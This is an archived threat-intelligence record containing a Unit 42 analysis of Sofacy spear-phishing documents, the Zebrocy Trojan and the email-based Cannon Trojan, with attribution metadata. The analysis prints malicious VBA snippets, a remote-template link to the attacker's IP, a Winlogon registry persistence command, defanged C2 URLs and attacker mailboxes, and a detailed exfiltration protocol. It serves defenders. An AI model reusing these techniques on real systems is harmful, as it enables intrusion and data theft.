{ "id": "8c8dcf7c-9f20-4529-bc98-08c82ba6cb44", "created_at": "2026-04-06T00:17:19.32552Z", "updated_at": "2026-04-10T03:37:50.285242Z", "deleted_at": null, "sha1_hash": "546eeca67bc1d06024b5481814e603853a6d7950", "title": "Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1061126, "plain_text": "Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’\r\nTrojan\r\nBy Robert Falcone, Bryan Lee\r\nPublished: 2018-11-20 · Archived: 2026-04-05 16:47:07 UTC\r\nIn late October and early November 2018, Unit 42 intercepted a series of weaponized documents that use a\r\ntechnique to load remote templates containing a malicious macro. These types of weaponized documents are not\r\nuncommon but are more difficult to identify as malicious by automated analysis systems due to their modular\r\nnature. Specific to this technique, if the C2 server is not available at the time of execution, the malicious code\r\ncannot be retrieved, rendering the delivery document largely benign.\r\nThe weaponized documents targeted several government entities around the globe, including North America,\r\nEurope, and a former USSR state. Fortunately for us, the C2 servers for several of these documents were still\r\noperational allowing for retrieval of the malicious macro and the subsequent payloads. Analysis revealed a\r\nconsistent first-stage payload of the well-documented Zebrocy Trojan. Additional collection of related documents\r\nrevealed a second first-stage payload that we have named ‘Cannon’. Cannon has not been previously observed in\r\nuse by the Sofacy group and contains a novel email-based C2 communication channel. Email as a C2 channel is\r\nnot a new tactic, but it is generally not observed in the wild as often as HTTP or HTTPS. Using email as a C2\r\nchannel may also decrease the chance of detection, as sending email via non-sanctioned email providers may not\r\nnecessarily construe suspicious or even malicious activity in many enterprises.\r\nThe activity discussed in this blog revolves around two of the multitude of weaponized documents that we\r\ncollected. These two documents shared multiple data artifacts, such as a shared C2 IP, shared author name, and\r\nshared tactics. Details of the extended attack campaign associated with the Cannon Trojan will be discussed in a\r\nlater blog. A particularly interesting aspect of one of the two documents we analyzed was the filename used, crash\r\nlist(Lion Air Boeing 737).docx. This is not the first instance of an adversary group using recent current events as a\r\nlure, but it is interesting to see this group attempt to capitalize on the attention of a catastrophic event to execute\r\ntheir attack.\r\nAttack Details\r\nThe initial sample we intercepted was a Microsoft Word document (SHA256:\r\n2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f) with the filename crash list(Lion Air\r\nBoeing 737).docx using the author name Joohn. This document appeared to be targeting a government\r\norganization dealing with foreign affairs in Europe via spear-phishing. Once the user attempts to open the\r\ndocument, Microsoft Word immediately attempts to load the remote template containing a malicious macro and\r\npayload from the location specified within the settings.xml.rels file of the DOCX document, as seen here:\r\n\u003cRelationship Id=\"rId1\"\r\nType=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate\"\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 1 of 11\n\nTarget=\"hxxp://188.241.58[.]170/live/owa/office.dotm\" TargetMode=\"External\"/\u003e\r\nIf the C2 has already been taken offline the document will still open, but Word will be unable to retrieve the\r\nremote template and thus Word will not load a macro. In this situation, Word will present the same lure document\r\nto the victim as seen in Figure 2, but without the ability to enable macros via an Enable Content button. Assuming\r\nthe C2 is still operational however, Word loads the remote template (SHA256:\r\nf1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5) and the user is presented with the\r\nscreen as seen in Figure 1.\r\nFigure 1 Lure screen\r\nOnce the victim presses the Enable content button, the embedded macro is executed. The macros used for these\r\ndelivery documents use a less common method of using the AutoClose function. This is a form of anti-analysis as\r\nWord will not fully execute the malicious code until the user closes the document. If an automated sandbox exits\r\nits analysis session without specifically closing out the document, the sandbox may miss the malicious activity\r\nentirely. Once successfully executed, the macro will install a payload and save a document to the system.\r\nTypically, we expect to see a decoy document saved to the system and later displayed to make the victim less\r\nsuspicious of malicious activity; however, in this case the document saved to the system was never displayed and\r\ndoes not contain any pertinent content to the Lion Air tragedy theme seen in the filename. The macro obtains the\r\ndocument saved to the system from within the document stored as UserForm1.Label1.Caption and will write it to:\r\n%TEMP%\\~temp.docm\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 2 of 11\n\nThe macro obtains the payload saved to the system from within the document stored as\r\nUserForm1.Label2.Caption and will write it to:\r\n%APPDATA%\\MSDN\\~msdn.exe\r\nThe macro executes this payload in a rather interesting way by loading the dropped ~temp.docm document and\r\ncalling a function within its embedded macro to run the payload. We believe the creator of this delivery document\r\nchose to run the payload from the dropped file as an evasion technique. Also, the fact the initial macro uses this\r\ndropped document for the execution of the payload may also explain why the document did not contain any decoy\r\ncontents.\r\nTo carry out this functionality, after writing the  ~temp.docm and ~msdn.exe files to the system, the initial macro\r\nwill load the ~temp.docm file as a Word Document object and attempts to run the function Proc1 in the Module1\r\nmacro within the ~temp.docm file, as seen in the following code snippet:\r\nSet WA = CreateObject(\"Word.Application\")\r\nWA.Visible = False\r\nSet oMyDoc = WA.Documents.Open(vF)\r\nWA.Application.Run \"Module1.Proc1\"\r\nThe Proc1 function within the Module1 does nothing more than build the %APPDATA%\\MSDN\\~msdn.exe path\r\nto the dropped payload and executes it using the built-in Shell function, as seen in the following code snippet:\r\nvAdd = \"~msdn\"\r\nvFileName = Environ(\"APPDATA\") \u0026 \"\\MSDN\\\"\r\nvFileName = vFileName + vAdd \u0026 \".e\" + \"x\" \u0026 \"e\"\r\nShell vFileName\r\nThe payload dropped to the system (SHA256:\r\n6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a) is a UPX packed Zebrocy variant\r\nwritten in the Delphi language. This variant of Zebrocy is functionally very similar to the Delphi-based payloads\r\ndiscussed in our previous publication on Sofacy attacks using Zebrocy earlier this year. The developer of this\r\nparticular payload configured it to use the following URL to communicate with as its C2:\r\nhxxp://188.241.58[.]170/local/s3/filters.php\r\nThe Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST\r\nrequest to the above URL. Like other Zebrocy samples, this Trojan collects system specific information it will\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 3 of 11\n\nsend to the C2 server by running the command SYSTEMINFO \u0026 TASKLIST on the command line and by\r\nenumerating information about connected storage devices. This specific variant of Zebrocy will also send a\r\nscreenshot of the victim host as a JPEG image to the C2 server. The C2 server will then provide a secondary\r\npayload to the beacon in ASCII hexadecimal representation, which the Trojan will decode and write to the\r\nfollowing location:\r\n%APPDATA%\\Roaming\\Audio\\soundfix.exe\r\nDuring our analysis, the C2 server provided a secondary payload that functionally appeared similar to the initial\r\nZebrocy sample. The secondary payload was also written in Delphi and its developer configured it to\r\ncommunicate with its C2 server using HTTPS via the following URL:\r\nhxxps://200.122.181[.]25/catalog/products/books.php\r\nNew Cannon Trojan\r\nWe were able to collect a second delivery document that shared the Joohn author from the crash list(Lion Air\r\nBoeing 737).docx document, as well as the 188.241.58[.]170 C2 IP to host its remote template. Structurally this\r\nsample was very similar to the initially analyzed document, but the payload turned out to be a completely new tool\r\nwhich we have named Cannon.\r\nThe tool is written in C# whose malicious code exists in a namespace called cannon, which is the basis of the\r\nTrojan’s name. The Trojan functions primarily as a downloader that relies on emails to communicate between the\r\nTrojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email\r\naddresses via SMTPS over TCP port 587. The specific functions of Cannon can be seen in Table 1. This tool also\r\nhas a heavy reliance on EventHandlers with timers to run its methods in a specific order and potentially increase\r\nits evasion capability.\r\nFunction Description\r\nTimer\r\n(seconds)\r\nstart_Tick Adds persistence and generates unique system specific identifier 1\r\ninf_Tick Gathers system information 300\r\nscreen_Tick Takes a screenshot of the desktop 10\r\ntxt_Tick Logs into primary POP3 account and gets secondary POP3 account 120\r\nload_Tick Logs into secondary POP3 account to download attachment to email 120\r\nsubject_Tick\r\nLogs into primary POP3 account to get path to for the downloaded\r\nattachment\r\n120\r\nrun_Tick\r\nMoves the downloaded attachment to path and creates a process with\r\nattachment\r\n60\r\nTable 1 Functions executed by Cannon and their purpose\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 4 of 11\n\nThe overall purpose of Cannon is to use several email accounts to send system data (system information and\r\nscreenshot) to the threat actors and to ultimately obtain a payload from an email from the actors. The image in\r\nFigure 2, in addition to the following step-by-step process illustrates how Cannon communicates with the actor-controlled C2 email address to obtain a secondary payload:\r\nFigure 2 C2 process flow for Cannon\r\n1. Cannon gathers system information and saves it to a file named ini. The Trojan sends an email to\r\nsahro.bella7[at]post.cz with i.ini as the attachment, S_inf within the body and a subject with a unique\r\nsystem identifier via SMTPS from one of the following accounts:\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 5 of 11\n\nBishtr.cam47\r\nLobrek.chizh\r\nCervot.woprov\r\n2. Cannon takes a screenshot and saves it to a file named ops. The Trojan sends an email to\r\nsahro.bella7[at]post.cz with sysscr.ops as the attachment, the string SCreen within the body and a subject\r\nwith the unique system identifier via SMTPS from one of three previously used accounts.\r\n3. The actors likely log into sahro.bella7[at]post.cz and process the system information and screenshot sent by\r\nthe Trojan to determine if the compromised host is of interest. If the actor wishes to download an additional\r\npayload to the compromised host, they will respond by sending emails in the following steps.\r\n4. The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a\r\nsecondary email account and credentials in ASCII hexadecimal format within the message body. This\r\nsecondary email account is unknown at this time, so we will refer to it as \"secondary email account\" in\r\nfuture steps.\r\n5. The actor sends an email to the secondary email account with the unique system identifier as a subject with\r\na secondary payload attached with a filename of txt.\r\n6. Cannon logs into the trala.cosh2[at]post.cz account via POP3S looking for emails with a subject that\r\nmatches the unique system identifier. Cannon opens the email with the correct subject and decodes the\r\nhexadecimal data in the body of the message to obtain the secondary email account.\r\n7. Cannon acknowledges the receipt of the secondary email address by sending an email\r\nto sahro.bella7[at]post.cz with s.txt (contains {SysPar = 65} string) as the attachment, ok within the body\r\nand a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1.\r\n8. The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a file\r\npath that the Cannon Trojan will use to save the secondary payload.\r\n9. Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches\r\nthe unique system identifier. Cannon opens the email with the correct subject and saves the attachment\r\nnamed auddevc.txt.\r\n10. Cannon acknowledges the receipt of file download by sending an email to sahro.bella7[at]post.cz with l.txt\r\n(contains 090 string) as the attachment, ok2 within the body and a subject with the unique system identifier\r\nvia SMTPS from one of the three accounts from Step 1.\r\n11. Cannon logs into the trala.cosh2[at]post.cz account via POP3S looking for emails with a subject that\r\nmatches the unique system identifier. Cannon opens the email with the correct subject and decodes the\r\nhexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded\r\nauddevc.txt file.\r\n12. Cannon acknowledges the receipt of file path by sending an email to sahro.bella7[at]post.cz with s.txt\r\n(contains {SysPar = 65} string) as the attachment, ok3 within the body and a subject with the unique\r\nsystem identifier via SMTPS from one of the three accounts from Step 1.\r\n13. Cannon moves the downloaded file to the specified path.\r\n14. Cannon acknowledges the successful move by sending an email to sahro.bella7[at]post.cz with l.txt\r\n(contains 090 string) as the attachment, ok4 within the body and a subject with the unique system identifier\r\nvia SMTPS from one of the three accounts from Step 1.\r\n15. Cannon runs the downloaded file from the specified path.\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 6 of 11\n\n16. Cannon acknowledges the successful execution by sending an email to sahro.bella7[at]post.cz with s.txt\r\n(contains {SysPar = 65} string) as the attachment, ok5 within the body and a subject with the unique\r\nsystem identifier via SMTPS from one of the three accounts from Step 1.\r\nFor a complete analysis of Cannon, please refer to the Appendix.\r\nConclusion\r\nThe Sofacy threat group continues to target government organizations in the EU, US, and former Soviet states to\r\ndeliver the Zebrocy tool as a payload. In these attacks, the delivery documents used to install Zebrocy used remote\r\ntemplates, which increases the difficulty to analyze the attack as an active C2 server is needed to obtain the macro-enabled document. The Sofacy group also leveraged the recent Lion Air disaster as a lure in one of these attacks,\r\nwhich continues to show a willingness to use current events in their social engineering themes.\r\nOf note, we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan\r\ncalled Cannon. Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more\r\ncommonly observed HTTP or HTTPS based C2. This is not a new tactic but may be more effective at evading\r\ndetection as the external hosts involved are a legitimate email service provider. Add the layer of encryption that\r\nthe SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2\r\nchannel to block\r\nWhile Sofacy’s campaign delivering Zebrocy and Cannon remains active, Palo Alto Networks customers are\r\nprotected from this threat in the following ways:\r\nAutoFocuscustomers can track these samples with the Zebrocy and Cannon\r\nWildFiredetects the delivery documents, Zebrocy and Cannon payloads discussed in this blog with\r\nmalicious verdicts.\r\nTraps blocks the macro-ladened remote templates as Suspicious macro detected, as well as Zebrocy and\r\nCannon payloads as Suspicious executable detected.\r\nThe IP addresses hosting remote templates and C2 services in these attacks are classified as Command and\r\nControl.\r\nIndicators of Compromise\r\nDelivery Hashes\r\n2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f\r\naf77e845f1b0a3ae32cb5cfa53ff22cc9dae883f05200e18ad8e10d7a8106392\r\nRemote Template Hashes\r\nf1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5\r\nfc69fb278e12fc7f9c49a020eff9f84c58b71e680a9e18f78d4e6540693f557d\r\nRemote Templates\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 7 of 11\n\nhxxp://188.241.58[.]170/live/owa/office.dotm\r\nZebrocy Hashes\r\n6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a\r\nZebrocy C2 URLs\r\nhxxp://188.241.58[.]170/local/s3/filters.php\r\nhxxps://200.122.181[.]25/catalog/products/books.php\r\nCannon Hashes\r\n61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e\r\nCannon Email Accounts\r\nsahro.bella7[at]post.cz\r\ntrala.cosh2[at]post.cz\r\nbishtr.cam47[at]post.cz\r\nlobrek.chizh[at]post.cz\r\ncervot.woprov[at]post.cz\r\nAppendix\r\nThe Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate\r\nbetween the Trojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific\r\nemail addresses via SMTPS over TCP port 587. This tool uses a variety of functions that are run in a specific order\r\nto:\r\nGather system information and a screenshot\r\nSend the gathered information to the actor via an email\r\nCheck inbox for email from actor with payload attached\r\nDownload payload attached to email\r\nExecute downloaded payload\r\nThe functions called to carry out these activities are as follows:\r\nstart_Tick\r\nThis function starts off by writing the string {SysPar = 65} to a file named s.txt, which will be used during C2\r\ncommunications throughout the execution of this Trojan. This function is also responsible for creating persistence\r\nby writing the following to r.bat and executing it:\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 8 of 11\n\nREG ADD \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Shell /t REG_SZ /d [path to\r\nwsslc.exe]\r\nIt also creates a unique system specific identifier that it will use during the C2 communications to send and\r\nreceive messages. The system specific identifier is a 16 character string that the Trojan creates using the serial\r\nnumber of the C volume and the first 4 hexadecimal bytes from Environment.UserName. The start_Tick function\r\nthen begins the timer to run the inf_Tick method.\r\ninf_Tick\r\nResponsible for gathering system information, which it then saves to the i.ini file:\r\nApplication.ExecutablePath\r\nEnvironment.OSVersion\r\nEnvironment.SystemDirectory\r\nEnvironment.UserDomainName\r\nEnvironment.MachineName\r\nEnvironment.UserName\r\nTimeZone.CurrentTimeZone.StandardName\r\nEnvironment.TickCount\r\nDriveInfo.GetDrives() - Name,VolumeLabel,DriveFormat,DriveType,TotalSize,AvailableFreeSpace,Serial\r\nnumber\r\nFolders in C:\\Program Files\\\r\nFolders in C:\\Program Files (x86)\\\r\nProcess.GetProcesses\r\nIt will use the aforementioned authentication credentials to log into the SMTP server to send the i.ini file to the C2\r\nemail address. The email sent to exfiltrate this information will have i.ini attached to it with the unique system\r\nidentifier as the subject and S_inf within the body of the email message. The inf_Tick function then begins the\r\ntimer to run the screen_Tick method.\r\nscreen_Tick\r\nTakes a screenshot of the desktop and saves it to a file named sysscr.ops. It will use the aforementioned\r\nauthentication credentials to log into the SMTP server to send the sysscr.ops file to the C2 email address. The\r\nemail sent to exfiltrate this information will have sysscr.ops file attached to it with the unique system identifier as\r\nthe subject and SCreen within the body of the email message. The screen_Tick function then begins the timer to\r\nrun the txt_Tick method.\r\ntxt_Tick\r\nThe Trojan will attempt to log into pop.seznam[.]cz over POP3s using the account name trala.cosh2[at]post.cz. If\r\nsuccessful, the Trojan will access the messages in the inbox, specifically looking for any emails that have a subject\r\nthat matches the unique system identifier. If an email exists, the Trojan will treat the email's body as hexadecimal\r\nformat and save it to a variable that will be used by the load_Tick function. The Trojan will delete the email after\r\nreading and processing these emails.\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 9 of 11\n\nIf the Trojan obtained the text from the email, it will use the aforementioned authentication credentials to log into\r\nthe SMTP server to send the s.txt file to the C2 email address. The email sent to exfiltrate this information will\r\nhave s.txt file attached to it with the unique system identifier as the subject and the string ok within the body of the\r\nemail message. The txt_Tick function then begins the timer to run the load_Tick method.\r\nload_Tick\r\nThe Trojan will first remove all occurrences of B\u0026 and Db from the text obtained from the email in the txt_Tick\r\nfunction. The Trojan will then split the remaining text on the % character and treat the content to the left of the %\r\ncharacter as an account name and the content to the right as a password. The Trojan uses these credentials to log\r\ninto another email account at pop.seznam[.]cz via POP3s, which it will check for email messages that have the\r\nunique system identifier as the subject. The Trojan will parse emails with the correct subject to obtain its\r\nattachments. The Trojan will save any attachments whose names contain the string auddevc to the system, which\r\nis meant to download a file named auddevc.txt. The Trojan will also create a file named l.txt that it will write the\r\nstring 090 to.\r\nIf the Trojan obtained the file from the email, it will use the aforementioned authentication credentials to log into\r\nthe SMTP server to send the l.txt file to the C2 email address. The email sent to exfiltrate this information will\r\nhave l.txt file attached to it with the unique system identifier as the subject and ok2 within the body of the email\r\nmessage. The load_Tick function then begins the timer to run the subject_Tick method.\r\nsubject_Tick\r\nThis function is very similar in functionality to the txt_Tick function. Just like the txt_Tick function, the Trojan\r\nwill attempt to log into pop.seznam[.]cz over POP3s using the account name trala.cosh2@post[.]cz, again looking\r\nfor subject of emails in the inbox that match the unique system identifier. The Trojan will then treat the body of\r\nthe email as hexadecimal data that it will save to a variable that will be used by the run_Tick function. The\r\ncontents saved to the variable should be the path in which the actor wishes the file saved in the load_Tick function\r\nto be moved to and run from.\r\nIf the Trojan obtained the text from the email, it will use the aforementioned authentication credentials to log into\r\nthe SMTP server to send the s.txt file to the C2 email address. The email sent to exfiltrate this information will\r\nhave s.txt file attached to it with the unique system identifier as the subject and ok3 within the body of the email\r\nmessage. The subject_Tick function then begins the timer to run the run_Tick method.\r\nrun_Tick\r\nThe Trojan will first attempt to create the directory within the path obtained from the email in the\r\nsubject_Tick function. It then attempts to move the auddevc.txt file downloaded in the load_Tick function to the\r\nnewly created directory. If the file was successfully moved, the Trojan it will use the aforementioned\r\nauthentication credentials to log into the SMTP server to send the l.txt file to the C2 email address. The email sent\r\nto exfiltrate this information will have l.txt file attached to it with the unique system identifier as the subject and\r\nok4 within the body of the email message.\r\nThe Trojan then attempts to create a process using the newly moved downloaded file. If the Trojan was able to\r\nsuccessfully run the download file, it will use the aforementioned authentication credentials to log into the SMTP\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 10 of 11\n\nserver to send the s.txt file to the C2 email address. The email sent to exfiltrate this information will have s.txt file\r\nattached to it with the unique system identifier as the subject and ok5 within the body of the email message. The\r\nTrojan would then delete the sysscr.ops screenshot file and the i.ini system information file before exiting.\r\nSource: https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "references": [ "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" ], "report_names": [ "unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan" ], "threat_actors": [ { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434639, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/546eeca67bc1d06024b5481814e603853a6d7950.pdf", "text": "https://archive.orkl.eu/546eeca67bc1d06024b5481814e603853a6d7950.txt", "img": "https://archive.orkl.eu/546eeca67bc1d06024b5481814e603853a6d7950.jpg" } }